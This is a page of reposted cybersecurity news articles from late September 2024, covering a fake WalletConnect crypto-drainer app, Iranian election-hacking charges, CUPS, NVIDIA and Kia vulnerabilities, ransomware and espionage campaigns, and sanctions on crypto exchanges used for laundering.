H January(68) February(106) March(112) April(110) June(37) July(114) August(126) September(95) October(0) November(0) December(0) | DefCon32 BLACKHAT USA 2024 | BLACKHAT USA 2024 ZIP DEFCON32 ZIP
Crypto Scam App Disguised as WalletConnect Steals $70K in Five-Month Campaign
28.9.24 Cryptocurrency The Hacker News
Cybersecurity researchers have discovered a malicious Android app on the Google Play Store that enabled the threat actors behind it to steal approximately $70,000 in cryptocurrency from victims over a period of nearly five months.
The dodgy app, identified by Check Point, masqueraded as the legitimate WalletConnect open-source protocol to trick unsuspecting users into downloading it.
"Fake reviews and consistent branding helped the app achieve over 10,000 downloads by ranking high in search results," the cybersecurity company said in an analysis, adding it's the first time a cryptocurrency drainer has exclusively targeted mobile device users.
Over 150 users are estimated to have fallen victim to the scam, although it's believed that not all users who downloaded the app were impacted by the cryptocurrency drainer.
The campaign involved distributing a deceptive app that went by several names such as "Mestox Calculator," "WalletConnect - DeFi & NFTs," and "WalletConnect - Airdrop Wallet" (co.median.android.rxqnqb).
While the app is no longer available for download from the official app marketplace, data from SensorTower shows that it was popular in Nigeria, Portugal, and Ukraine, and linked to a developer named UNS LIS.
The developer has also been associated with another Android app called "Uniswap DeFI" (com.lis.uniswapconverter) that remained active on the Play Store for about a month between May and June 2023. It's currently not known if the app had any malicious functionality.
However, both apps can be downloaded from third-party app store sources, once again highlighting the risks posed by downloading APK files from other marketplaces.
Once installed, the fake WallConnect app is designed to redirect users to a bogus website based on their IP address and User-Agent string, and if so, redirect them a second time to another site that mimics Web3Inbox.
Users who don't meet the required criteria, including those who visit the URL from a desktop web browser, are taken to a legitimate website to evade detection, effectively allowing the threat actors to bypass the app review process in the Play Store.
Besides taking steps to prevent analysis and debugging, the core component of the malware is a cryptocurrency drainer known as MS Drainer, which prompts users to connect their wallet and sign several transactions to verify their wallet.
The information entered by the victim in each step is transmitted to a command-and-control server (cakeserver[.]online) that, in turn, sends back a response containing instructions to trigger malicious transactions on the device and transfer the funds to a wallet address belonging to the attackers.
"Similar to the theft of native cryptocurrency, the malicious app first tricks the user into signing a transaction in their wallet," Check Point researchers said.
"Through this transaction, the victim grants permission for the attacker's address 0xf721d710e7C27323CC0AeE847bA01147b0fb8dBF (the 'Address' field in the configuration) to transfer the maximum amount of the specified asset (if allowed by its smart contract)."
In the next step, the tokens from the victim's wallet are transferred to a different wallet (0xfac247a19Cc49dbA87130336d3fd8dc8b6b944e1) controlled by the attackers.
This also means that if the victim does not revoke the permission to withdraw tokens from their wallet, the attackers can keep withdrawing the digital assets as soon as they appear without requiring any further action.
Check Point said it also identified another malicious app exhibiting similar features "Walletconnect | Web3Inbox" (co.median.android.kaebpq) that was previously available on Google Play Store in February 2024. It attracted more than 5,000 downloads.
"This incident highlights the growing sophistication of cybercriminal tactics, particularly in the realm of decentralized finance, where users often rely on third-party tools and protocols to manage their digital assets," the company noted.
"The malicious app did not rely on traditional attack vectors like permissions or keylogging. Instead, it used smart contracts and deep links to silently drain assets once users were tricked into using the app."
U.S. Charges Three Iranian Nationals for Election Interference and Cybercrimes
28.9.24 BigBrothers The Hacker News
U.S. federal prosecutors on Friday unsealed criminal charges against three Iranian nationals who are allegedly employed with the Islamic Revolutionary Guard Corps (IRGC) for their targeting of current and former officials to steal sensitive data.
The Department of Justice (DoJ) accused Masoud Jalili, 36, Seyyed Ali Aghamiri, 34, and Yasar (Yaser) Balaghi, 37, of participating in a conspiracy with other known and unknown actors to undermine the U.S. electoral process.
They are alleged to have hacked into accounts of current and former U.S. officials, members of the media, nongovernmental organizations, and individuals associated with U.S. political campaigns. None of the three operatives, said to be members of the Basij Resistance Force, have been arrested.
"The activity was part of Iran's continuing efforts to stoke discord, erode confidence in the U.S. electoral process, and unlawfully acquire information relating to current and former U.S. officials that could be used to advance the malign activities of the IRGC, including ongoing efforts to avenge the death of Qasem Soleimani, the former commander of the IRGC – Qods Force (IRGC-QF)," the DoJ said.
The activity, per the DoJ, entailed obtaining access to non-public campaign documents and emails related to the election campaign sometime around May 2024. Then the next month, the conspirators engaged in hack-and-leak operations by sharing the stolen campaign material with media publications and individuals associated with the other presidential campaign.
The development comes nearly two weeks after the U.S. Federal Bureau of Investigation (FBI) blamed Iranian threat actors for plundering non-public material from former President Trump's campaign and passing it on to President Biden's campaign and U.S. media organizations.
"These hack-and-leak efforts by Iran are a direct assault on the integrity of our democratic processes," said Assistant Attorney General Matthew G. Olsen of the Justice Department's National Security Division.
"Iranian government actors have long sought to use cyber-enabled means to harm U.S. interests. This case demonstrates our commitment to expose attempts by the Iranian regime or any other foreign actor to interfere with our free and open society."
Jalili, Aghamiri, and Balaghi have also been accused of undertaking a wide-ranging hacking campaign starting back in January 2020 to infiltrate victims' computers and online accounts using a combination of spear-phishing and social engineering techniques.
This involved the use of fake personas to trick users into clicking on malicious links and spoofing login pages to harvest account credentials and using the compromised victim accounts to send phishing messages to other targets. The DoJ said some of these efforts were successful.
The trio have been charged with 18 counts that include conspiracy to commit identity theft, aggravated identity theft, access device fraud, unauthorized access to computers to obtain information from a protected computer, unauthorized access to computers to defraud and obtain a thing of value, and wire fraud.
In coordination with the indictment, the Department of State has issued a reward of up to $10 million for information on Jalili, Aghamiri, and Balaghi, the IRGC's interference in U.S. elections, or associated individuals and entities.
The U.S. Department of the Treasury's Office of Foreign Asset Control (OFAC) has imposed sanctions against seven individuals for their malicious cyber activities, including spear-phishing, hack-and-leak operations, and their alleged interference with political campaigns -
Masoud Jalili
Ali Mahdavian, Fatemeh Sadeghi, Elaheh Yazdi, Sayyed Mehdi Rahimi Hajjiabadi, Mohammad Hosein Abdolrahimi, and Rahmatollah Askarizadeh (employees and executives of Emennet Pasargad)
It's worth noting that the U.S. government previously sanctioned six other employees of the same company in November 2021 for their attempts to interfere in the 2020 U.S. presidential election.
"The Iranian regime is increasingly attempting to influence the outcome of the forthcoming U.S. election because it perceives the outcome will impact U.S. foreign policy towards Iran," the State Department said.
"Iranian state-sponsored actors have undertaken a variety of malicious cyber activities, such as hack-and-leak operations and spear-phishing, in an attempt to undermine confidence in the United States' election processes and institutions while also seeking to influence the political campaigns."
In August, Iran denied accusations that it played any role in the hack, calling them baseless and that Iran's "cyber power is defensive and in proportionate to the threats it faces," Iran's state-controlled news agency IRNA reported.
The indictment is the latest effort by the U.S. government to counter foreign efforts to interfere in the upcoming election. Recently, it also brought criminal charges and sanctions against employees of Russian state media outlet RT for allegedly funding pro-Trump social-media influencers in the U.S.
Progress Software Releases Patches for 6 Flaws in WhatsUp Gold – Patch Now
28.9.24 Vulnerebility The Hacker News
Progress Software has released another round of updates to address six security flaws in WhatsUp Gold, including two critical vulnerabilities.
The issues, the company said, have been resolved in version 24.0.1 released on September 20, 2024. The company has yet to release any details about what the flaws are other than listing their CVE identifiers -
CVE-2024-46905 (CVSS score: 8.8)
CVE-2024-46906 (CVSS score: 8.8)
CVE-2024-46907 (CVSS score: 8.8)
CVE-2024-46908 (CVSS score: 8.8)
CVE-2024-46909 (CVSS score: 9.8), and
CVE-2024-8785 (CVSS score: 9.8)
Security researcher Sina Kheirkhah of Summoning Team has been credited with discovering and reporting the first four flaws. Andy Niu of Trend Micro has been acknowledged for CVE-2024-46909, while Tenable has been credited for CVE-2024-8785.
It's worth noting that Trend Micro recently reported that threat actors are actively exploiting proof-of-concept (PoC) exploits for other recently disclosed security flaws in WhatsUp Gold to conduct opportunistic attacks.
Previously, the Shadowserver Foundation said it had observed exploitation attempts against CVE-2024-4885 (CVSS score: 9.8), another critical bug in WhatsUp Gold that was resolved by Progress in June 2024.
WhatsUp Gold Customers are recommended to apply the latest fixes as soon as possible to mitigate potential threats.
Critical Linux CUPS Printing System Flaws Could Allow Remote Command Execution
27.9.24 Vulnerebility The Hacker News
A new set of security vulnerabilities has been disclosed in the OpenPrinting Common Unix Printing System (CUPS) on Linux systems that could permit remote command execution under certain conditions.
"A remote unauthenticated attacker can silently replace existing printers' (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer)," security researcher Simone Margaritelli said.
CUPS is a standards-based, open-source printing system for Linux and other Unix-like operating systems, including ArchLinux, Debian, Fedora, Red Hat Enterprise Linux (RHEL), ChromeOS, FreeBSD, NetBSD, OpenBSD, openSUSE, and SUSE Linux.
The list of vulnerabilities is as follows -
CVE-2024-47176 - cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL
CVE-2024-47076 - libcupsfilters <= 2.1b1 cfGetPrinterAttributes5 does not validate or sanitize the IPP attributes returned from an IPP server, providing attacker-controlled data to the rest of the CUPS system
CVE-2024-47175 - libppd <= 2.1b1 ppdCreatePPDFromIPP2 does not validate or sanitize the IPP attributes when writing them to a temporary PPD file, allowing the injection of attacker-controlled data in the resulting PPD
CVE-2024-47177 - cups-filters <= 2.0.1 foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter
A net consequence of these shortcomings is that they could be fashioned into an exploit chain that allows an attacker to create a malicious, fake printing device on a network-exposed Linux system running CUPS and trigger remote code execution upon sending a print job.
"The issue arises due to improper handling of 'New Printer Available' announcements in the 'cups-browsed' component, combined with poor validation by 'cups' of the information provided by a malicious printing resource," network security company Ontinue said.
"The vulnerability stems from inadequate validation of network data, allowing attackers to get the vulnerable system to install a malicious printer driver, and then send a print job to that driver triggering execution of the malicious code. The malicious code is executed with the privileges of the lp user – not the superuser 'root.'"
RHEL, in an advisory, said all versions of the operating system are affected by the four flaws, but noted that they are not vulnerable in their default configuration. It tagged the issues as Important in severity, given that the real-world impact is likely to be low.
"By chaining this group of vulnerabilities together, an attacker could potentially achieve remote code execution which could then lead to theft of sensitive data and/or damage to critical production systems," it said.
Cybersecurity firm Rapid7 pointed out that affected systems are exploitable, either from the public internet or across network segments, only if UDP port 631 is accessible and the vulnerable service is listening.
Palo Alto Networks has disclosed that none of its products and cloud services contain the aforementioned CUPS-related software packages, and therefore are not impacted by the flaws.
Patches for the vulnerabilities are currently being developed and are expected to be released in the coming days. Until then, it's advisable to disable and remove the cups-browsed service if it's not necessary, and block or restrict traffic to UDP port 631.
"It looks like the embargoed Linux unauth RCE vulnerabilities that have been touted as doomsday for Linux systems, may only affect a subset of systems," Benjamin Harris, CEO of WatchTowr, said in a statement shared with The Hacker News.
"Given this, while the vulnerabilities in terms of technical impact are serious, it is significantly less likely that desktop machines/workstations running CUPS are exposed to the Internet in the same manner or numbers that typical server editions of Linux would be."
Satnam Narang, senior staff research engineer at Tenable, said these vulnerabilities are not at a level of a Log4Shell or Heartbleed.
"The reality is that across a variety of software, be it open or closed source, there are a countless number of vulnerabilities that have yet to be discovered and disclosed," Narang said. "Security research is vital to this process and we can and should demand better of software vendors."
"For organizations that are honing in on these latest vulnerabilities, it's important to highlight that the flaws that are most impactful and concerning are the known vulnerabilities that continue to be exploited by advanced persistent threat groups with ties to nation states, as well as ransomware affiliates that are pilfering corporations for millions of dollars each year."
Microsoft Identifies Storm-0501 as Major Threat in Hybrid Cloud Ransomware Attacks
27.9.24 APT The Hacker News
The threat actor known as Storm-0501 has targeted government, manufacturing, transportation, and law enforcement sectors in the U.S. to stage ransomware attacks.
The multi-stage attack campaign is designed to compromise hybrid cloud environments and perform lateral movement from on-premises to cloud environment, ultimately resulting in data exfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment, Microsoft said.
"Storm-0501 is a financially motivated cybercriminal group that uses commodity and open-source tools to conduct ransomware operations," according to the tech giant's threat intelligence team.
Active since 2021, the threat actor has a history of targeting education entities with Sabbath (54bb47h) ransomware before evolving into a ransomware-as-a-service (RaaS) affiliate delivering various ransomware payloads over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and Embargo ransomware.
A notable aspect of Storm-0501's attacks is the use of weak credentials and over-privileged accounts to move from organizations on-premises to cloud infrastructure.
Other initial access methods include using a foothold already established by access brokers like Storm-0249 and Storm-0900, or exploiting various known remote code execution vulnerabilities in unpatched internet-facing servers such as Zoho ManageEngine, Citrix NetScaler, and Adobe ColdFusion 2016.
The access afforded by any of the aforementioned approaches paves the way for extensive discovery operations to determine high-value assets, gather domain information, and perform Active Directory reconnaissance. This is followed by the deployment of remote monitoring and management tools (RMMs) like AnyDesk to maintain persistence.
"The threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted to gain access to more accounts within the network through several methods," Microsoft said.
"The threat actor primarily utilized Impacket's SecretsDump module, which extracts credentials over the network, and leveraged it across an extensive number of devices to obtain credentials."
The compromised credentials are then used to access even more devices and extract additional credentials, with the threat actor simultaneously accessing sensitive files to extract KeePass secrets and conducting brute-force attacks to obtain credentials for specific accounts.
Microsoft said it detected Storm-0501 employing Cobalt Strike to move laterally across the network using the compromised credentials and send follow-on commands. Data exfiltration from the on-premises environment is accomplished by using Rclone to transfer the data to the MegaSync public cloud storage service.
The threat actor has also been observed creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises, making it the latest threat actor to target hybrid cloud setups after Octo Tempest and Manatee Tempest.
"The threat actor used the credentials, specifically Microsoft Entra ID (formerly Azure AD), that were stolen from earlier in the attack to move laterally from the on-premises to the cloud environment and establish persistent access to the target network through a backdoor," Redmond said.
The pivot to the cloud is said to be accomplished either through a compromised Microsoft Entra Connect Sync user account or via cloud session hijacking of an on-premises user account that has a respective admin account in the cloud with multi-factor authentication (MFA) disabled.
The attack culminates with the deployment of Embargo ransomware across the victim organization upon obtaining sufficient control over the network, exfiltrating files of interest, and lateral movement to the cloud. Embargo is a Rust-based ransomware first discovered in May 2024.
"Operating under the RaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks in exchange for a share of the ransom," Microsoft said.
"Embargo affiliates employ double extortion tactics, where they first encrypt a victim's files and threaten to leak stolen sensitive data unless a ransom is paid."
The disclosure comes as the DragonForce ransomware group has been targeting companies in manufacturing, real estate, and transportation sectors using a variant of the leaked LockBit3.0 builder and a modified version of Conti.
The attacks are characterized by the use of the SystemBC backdoor for persistence, Mimikatz and Cobalt Strike for credential harvesting, and Cobalt Strike for lateral movement. The U.S. accounts for more than 50% of the total victims, followed by the U.K. and Australia.
"The group employs double extortion tactics, encrypting data, and threatening leaks unless a ransom is paid," Singapore-headquartered Group-IB said. "The affiliate program, launched on 26 June 2024, offers 80% of the ransom to affiliates, along with tools for attack management and automation."
New HTML Smuggling Campaign Delivers DCRat Malware to Russian-Speaking Users
27.9.24 Hacking The Hacker News
Russian-speaking users have been targeted as part of a new campaign distributing a commodity trojan called DCRat (aka DarkCrystal RAT) by means of a technique known as HTML smuggling.
The development marks the first time the malware has been deployed using this method, a departure from previously observed delivery vectors such as compromised or fake websites, or phishing emails bearing PDF attachments or macro-laced Microsoft Excel documents.
"HTML smuggling is primarily a payload delivery mechanism," Netskope researcher Nikhil Hegde said in an analysis published Thursday. "The payload can be embedded within the HTML itself or retrieved from a remote resource."
The HTML file, in turn, can be propagated via bogus sites or malspam campaigns. Once the file is launched via the victim's web browser, the concealed payload is decoded and downloaded onto the machine.
The attack subsequently banks on some level of social engineering to convince the victim to open the malicious payload.
Netskope said it discovered HTML pages mimicking TrueConf and VK in the Russian language that when opened in a web browser, automatically download a password-protected ZIP archive to disk in an attempt to evade detection. The ZIP payload contains a nested RarSFX archive that ultimately leads to the deployment of the DCRat malware.
First released in 2018, DCRat is capable of functioning as a full-fledged backdoor that can be paired with additional plugins to extend its functionality. It can execute shell commands, log keystrokes, and exfiltrate files and credentials, among others.
Organizations are recommended to review HTTP and HTTPS traffic to ensure that systems are not communicating with malicious domains.
The development comes as Russian companies have been targeted by a threat cluster dubbed Stone Wolf to infect them with Meduza Stealer by sending phishing emails masquerading as a legitimate provider of industrial automation solutions.
"Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim," BI.ZONE said. By using the names and data of real organizations, attackers have a greater chance to trick their victims into downloading and opening malicious attachments."
It also follows the emergence of malicious campaigns that have likely leveraged generative artificial intelligence (GenAI) to write VBScript and JavaScript code responsible for spreading AsyncRAT via HTML smuggling.
"The scripts' structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," HP Wolf Security said. "The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints."
U.S. Sanctions Two Crypto Exchanges for Facilitating Cybercrime and Money Laundering
27.9.24 Cryptocurrency The Hacker News
The U.S. government on Thursday sanctioned two cryptocurrency exchanges and unsealed an indictment against a Russian national for his alleged involvement in the operation of several money laundering services that were offered to cybercriminals.
The virtual currency exchanges, Cryptex and PM2BTC, have been alleged to facilitate the laundering of cryptocurrencies possibly obtained through cybercrime.
The coordinated action was carried out in collaboration with the Netherlands Police and the Dutch Fiscal Intelligence and Investigation Service (FIOD) as part of an ongoing law enforcement crackdown called Operation Endgame.
Pursuant to the exercise, the websites associated with both the exchanges have been confiscated and replaced with a law enforcement seizure banner. Furthermore, it has led to the seizure of cryptocurrency worth €7 million ($7.8 million).
"The United States and our international partners remain resolute in our commitment to prevent cybercrime facilitators like PM2BTC and Cryptex from operating with impunity," said Acting Under Secretary of the Treasury for Terrorism and Financial Intelligence Bradley T. Smith.
"Treasury, in close coordination with our allies and partners, will continue to use all tools and authorities to disrupt the networks that seek to leverage the virtual assets ecosystem to facilitate their illicit activities."
PM2BTC ("btc2pm[.]me"), the Treasury said, facilitated the laundering of convertible virtual currency (CVC) associated with ransomware and other illicit actors operating in Russia. It has been operational since 2014.
It's also said to have provided direct CVC-to-ruble exchange services, while failing to implement effective anti-money laundering (AML) and Know Your Customer (KYC) programs as required by U.S. federal law.
"PM2BTC facilitates a substantially greater proportion of transactions with apparent links to money laundering activity in connection with Russian illicit finance as compared to 99 percent of other virtual asset service providers," it said. "PM2BTC employs an unusual obfuscation that inhibits attribution of transactions to illicit activity and actors."
Cryptex ("Cryptex[.]net"), in a similar vein, has been accused of advertising virtual currency services directly to cybercriminals, receiving over $51.2 million in illicit proceeds derived from ransomware attacks. It further claimed "complete anonymity" when registering for an account.
It is also estimated to have received no less than $720 million in transactions linked to illegal services used by Russia-based ransomware actors and cybercriminals, including fraud shops, mixing services, exchanges lacking KYC programs, and the now-sanctioned virtual currency exchange Garantex.
A 44-year-old Russian national, Sergey Sergeevich Ivanov (aka UAPS or TALEON), has been charged for his role as a professional cyber money launderer for nearly two decades, and for providing his services, counting Cryptex and PM2BTC, to other e-crime groups and drug traffickers.
Ivanov's other charges include payment processing support to the carding website Rescator and laundering the illegal funds originating from Joker's Stash, another popular carding forum that voluntarily shut down its operations in February 2021.
Two such payment processing services are PinPays and UAPS ("uaps[.]so"), which stands for Universal Anonymous Payment System and has facilitated payments for several fraud shops like Genesis Market, BriansClub/Brian Dumps, and Faceless, per Chainalysis.
"UAPS and Cryptex have processed over $7.5 billion worth of transactions since their inception in 2013 and 2018, respectively," the blockchain analytics company noted.
Elliptic, another blockchain intelligence firm, said it's aware of "thousands of additional addresses" connected to Cryptex, PM2BTC, PinPays, and Joker's Stash, outside of the four cryptoasset addresses listed by the Treasury as tied to Cryptex.
A second Russian national, Timur Shakhmametov, 38, has also been charged with operating Joker's Stash and laundering its proceeds. The carding marketplace, which offered for sale data from nearly 40 million payment cards annually. It's believed that the service netted the threat actors anywhere between $280 million to more than $1 billion in profits.
Concurrent with the actions, the U.S. Department of State has announced rewards of up to $10 million each for information leading to the arrests and/or convictions of Timur Shakhmametov and Sergey Ivanov.
An additional $1 million is also up for grabs for providing information leading to the identification of other key members linked to UAPS, PM2BTC, PinPays, and Joker's Stash.
"One of the most critical tactics in disrupting illicit actors is to disrupt the infrastructure they abuse to facilitate money laundering and other transnational cybercrime," Chainalysis said.
"Today's actions represent [Office of Foreign Assets Control's] continued efforts to work with key international partners to make the internet a safer place by shutting down fraudulent services and the infrastructure that hosts them."
Critical NVIDIA Container Toolkit Vulnerability Could Grant Full Host Access to Attackers
27.9.24 Vulnerebility The Hacker News
A critical security flaw has been disclosed in the NVIDIA Container Toolkit that, if successfully exploited, could allow threat actors to break out of the confines of a container and gain full access to the underlying host.
The vulnerability, tracked as CVE-2024-0132, carries a CVSS score of 9.0 out of a maximum of 10.0. It has been addressed in NVIDIA Container Toolkit version v1.16.2 and NVIDIA GPU Operator version 24.6.2.
"NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system," NVIDIA said in an advisory.
"A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering."
The issue impacts all versions of NVIDIA Container Toolkit up to and including v1.16.1, and Nvidia GPU Operator up to and including 24.6.1. However, it does not affect use cases where Container Device Interface (CDI) is used.
Cloud security firm Wiz, which discovered and reported the flaw to NVIDIA on September 1, 2024, said it would allow an attacker who controls the container images run by the Toolkit to perform a container escape and gain full access to the underlying host.
In an hypothetical attack scenario, a threat actor could weaponize the shortcoming by creating a rogue container image that, when run on the target platform either directly or indirectly, grants them full access to the file system.
This could materialize in the form of a supply chain attack where the victim is tricked into running the malicious image, or, alternatively, via services that allow shared GPU resources.
"With this access, the attacker can now reach the Container Runtime Unix sockets (docker.sock/containerd.sock)," security researchers Shir Tamari, Ronen Shustin, and Andres Riancho said.
"These sockets can be used to execute arbitrary commands on the host system with root privileges, effectively taking control of the machine."
The problem poses a severe risk to orchestrated, multi-tenant environments, as it could permit an attacker to escape the container and obtain access to data and secrets of other applications running on the same node, and even the same cluster.
Technical aspects of the attack have been withheld at this stage to prevent exploitation efforts. It's highly recommended that users take steps to apply the patches to safeguard against potential threats.
"While the hype concerning AI security risks tends to focus on futuristic AI-based attacks, 'old-school' infrastructure vulnerabilities in the ever-growing AI tech stack remain the immediate risk that security teams should prioritize and protect against," the researchers said.
Hackers Could Have Remotely Controlled Kia Cars Using Only License Plates
26.9.24 Exploit The Hacker News
Cybersecurity researchers have disclosed a set of now patched vulnerabilities in Kia vehicles that, if successfully exploited, could have allowed remote control over key functions simply by using only a license plate.
"These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless of whether it had an active Kia Connect subscription," security researchers Neiko Rivera, Sam Curry, Justin Rhinehart, and Ian Carroll said.
The issues impact almost all vehicles made after 2013, even letting attackers covertly gain access to sensitive information including the victim's name, phone number, email address, and physical address.
Essentially, this could then be abused by the adversary to add themselves as an "invisible" second user on the car without the owner's knowledge.
The crux of the research is that the issues exploit the Kia dealership infrastructure ("kiaconnect.kdealer[.]com") used for vehicle activations to register for a fake account via an HTTP request and then generate access tokens.
The token is subsequently used in conjunction with another HTTP request to a dealer APIGW endpoint and the vehicle identification number (VIN) of a car to obtain the vehicle owner's name, phone number, and email address.
What's more, the researchers found that it's possible to gain access to a victim's vehicle by as trivially as issuing four HTTP requests, and ultimately executing internet-to-vehicle commands -
Generate the dealer token and retrieve the "token" header from the HTTP response using the aforementioned method
Fetch victim's email address and phone number
Modify owner's previous access using leaked email address and VIN number to add the attacker as the primary account holder
Add attacker to victim vehicle by adding an email address under their control as the primary owner of the vehicle, thereby allowing for running arbitrary commands
"From the victim's side, there was no notification that their vehicle had been accessed nor their access permissions modified," the researchers pointed out.
"An attacker could resolve someone's license plate, enter their VIN through the API, then track them passively and send active commands like unlock, start, or honk."
In a hypothetical attack scenario, a bad actor could enter the license plate of a Kia vehicle in a custom dashboard, retrieve the victim's information, and then execute commands on the vehicle after around 30 seconds.
Following responsible disclosure in June 2024, the flaws were addressed by Kia as of August 14, 2024. There is no evidence that these vulnerabilities were ever exploited in the wild.
"Cars will continue to have vulnerabilities, because in the same way that Meta could introduce a code change which would allow someone to take over your Facebook account, car manufacturers could do the same for your vehicle," the researchers said.
N. Korean Hackers Deploy New KLogEXE and FPSpy Malware in Targeted Attacks
26.9.24 APT The Hacker News
Threat actors with ties to North Korea have been observed leveraging two new malware strains dubbed KLogEXE and FPSpy.
The activity has been attributed to an adversary tracked as Kimsuky, which is also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), Sparkling Pisces, Springtail, and Velvet Chollima.
"These samples enhance Sparkling Pisces' already extensive arsenal and demonstrate the group's continuous evolution and increasing capabilities," Palo Alto Networks Unit 42 researchers Daniel Frank and Lior Rochberger said.
Active since at least 2012, the threat actor has been called the "king of spear phishing" for its ability to trick victims into downloading malware by sending emails that make it seem like they are from trusted parties.
Unit 42's analysis of Sparkling Pisces' infrastructure has uncovered two new portable executables referred to as KLogEXE and FPSpy.
KLogExe is a C++ version of the PowerShell-based keylogger named InfoKey that was highlighted by JPCERT/CC in connection with a Kimsuky campaign targeting Japanese organizations.
The malware comes equipped with capabilities to collect and exfiltrate information about the applications currently running on the compromised workstation, keystrokes typed, and mouse clicks.
On the other hand, FPSpy is said to be a variant of the backdoor that AhnLab disclosed in 2022, with overlaps identified to a malware that Cyberseason documented under the name KGH_SPY in late 2020.
FPSpy, in addition to keylogging, is also engineered to gather system information, download and execute more payloads, run arbitrary commands, and enumerate drives, folders, and files on the infected device.
Unit 42 said it was also able to identify points of similarities in the source code of both KLogExe and FPSpy, suggesting that they are likely the work of the same author.
"Most of the targets we observed during our research originated from South Korea and Japan, which is congruent with previous Kimsuky targeting," the researchers said.
Watering Hole Attack on Kurdish Sites Distributing Malicious APKs and Spyware
26.9.24 Virus The Hacker News
As many as 25 websites linked to the Kurdish minority have been compromised as part of a watering hole attack designed to harvest sensitive information for over a year and a half.
French cybersecurity firm Sekoia, which disclosed details of the campaign dubbed SilentSelfie, described the intrusion set as long-running, with first signs of infection detected as far back as December 2022.
The strategic web compromises are designed to deliver four different variants of an information-stealing framework, it added.
"These ranged from the simplest, which merely stole the user's location, to more complex ones that recorded images from the selfie camera and led selected users to install a malicious APK, i.e an application used on Android," security researchers Felix Aimé and Maxime A said in a Wednesday report.
Targeted websites include Kurdish press and media, Rojava administration and its armed forces, those related to revolutionary far-left political parties and organizations in Türkiye and Kurdish regions. Sekoia told The Hacker News that the exact method by which these websites were breached in the first place remains uncertain.
The attacks have not been attributed to any known threat actor or entity, indicating the emergence of a new threat cluster targeting the Kurdish community, which has been previously singled out by groups like StrongPity and BladeHawk.
Earlier this year, Dutch security firm Hunt & Hackett also revealed that Kurdish websites in the Netherlands were singled out by a Türkiye-nexus threat actor known as Sea Turtle.
The watering hole attacks are characterized by the deployment of a malicious JavaScript that's responsible for gathering various kinds of information from site visitors, including their location, device data (e.g., number of CPUs, battery status, browser language, etc.), and public IP address, among others.
One variant of the reconnaissance script found on three websites (rojnews[.]news, hawarnews[.]com, and targetplatform[.]net.) has also been observed redirecting users to rogue Android APK files, while some others include the ability for user tracking via a cookie named "sessionIdVal."
The Android app, per Sekoia's analysis, embeds the website itself as a WebView, while also clandestinely hoovering system information, contact lists, location, and files present in the external storage based on the permissions granted to it.
"It is worth noting that this malicious code doesn't have any persistence mechanism but is only executed when the user opens the RojNews application," the researchers pointed out.
"Once the user opens the application, and after 10 seconds, the LocationHelper service starts beaconning the background to the URL rojnews[.]news/wp-includes/sitemaps/ via HTTP POST requests, sharing the current location of the user and waiting for commands to execute."
Not much is known about who is behind SilentSelfie, but Sekoia has assessed that it could be the handiwork of the Kurdistan Regional Government of Iraq based on the arrest of RojNews journalist Silêman Ehmed by KDP forces in October 2023. He was sentenced to three years in prison in July 2024.
"Even though this watering hole campaign is of low sophistication, it is notable for the number of kurdish websites affected and its duration," the researchers said. "The campaign's low level of sophistication suggests it might be the work of an uncovered threat actor with limited capabilities and relatively new to the field."
Cloudflare Warns of India-Linked Hackers Targeting South and East Asian Entities
26.9.24 APT The Hacker News
An advanced threat actor with an India nexus has been observed using multiple cloud service providers to facilitate credential harvesting, malware delivery, and command-and-control (C2).
Web infrastructure and security company Cloudflare is tracking the activity under the name SloppyLemming, which is also called Outrider Tiger and Fishing Elephant.
"Between late 2022 to present, SloppyLemming has routinely used Cloudflare Workers, likely as part of a broad espionage campaign targeting South and East Asian countries," Cloudflare said in an analysis.
SloppyLemming is assessed to be active since at least July 2021, with prior campaigns leveraging malware such as Ares RAT and WarHawk, the latter of which is also linked to a known hacking crew called SideWinder. The use of Ares RAT, on the other hand, has been linked to SideCopy, a threat actor likely of Pakistani origin.
Targets of the SloppyLemming's activity span government, law enforcement, energy, education, telecommunications, and technology entities located in Pakistan, Sri Lanka, Bangladesh, China, Nepal, and Indonesia.
The attack chains involve sending spear-phishing emails to targets that aim to trick recipients into clicking on a malicious link by inducing a false sense of urgency, claiming that they need to complete a mandatory process within the next 24 hours.
Clicking on the URL takes the victim to a credential harvesting page, which then serves as a mechanism for the threat actor to gain unauthorized access to targeted email accounts within organizations that are of interest.
"The actor uses a custom-built tool named CloudPhish to create a malicious Cloudflare Worker to handle the credential logging logic and exfiltration of victim credentials to the threat actor," the company said.
Some of the attacks undertaken by SloppyLemming have leveraged similar techniques to capture Google OAuth tokens, as well as employ booby-trapped RAR archives ("CamScanner 06-10-2024 15.29.rar") that likely exploit a WinRAR flaw (CVE-2023-38831) to achieve remote code execution.
Present within the RAR file is an executable that, besides displaying the decoy document, stealthily loads "CRYPTSP.dll," which serves as a downloader to retrieve a remote access trojan hosted on Dropbox.
It's worth mentioning here that cybersecurity company SEQRITE detailed an analogous campaign undertaken by the SideCopy actors last year targeting Indian government and defense sectors to distribute the Ares RAT using ZIP archives named "DocScanner_AUG_2023.zip" and "DocScanner-Oct.zip" that are engineered to trigger the same vulnerability.
A third infection sequence employed by SloppyLemming entails using spear-phishing lures to lead prospective targets to a phony website that impersonates the Punjab Information Technology Board (PITB) in Pakistan, after which they are redirected to another site that contains an internet shortcut (URL) file.
The URL file comes embedded with code to download another file, an executable named PITB-JR5124.exe, from the same server. The binary is a legitimate file that's used to sideload a rogue DLL named profapi.dll that subsequently communicates with a Cloudflare Worker.
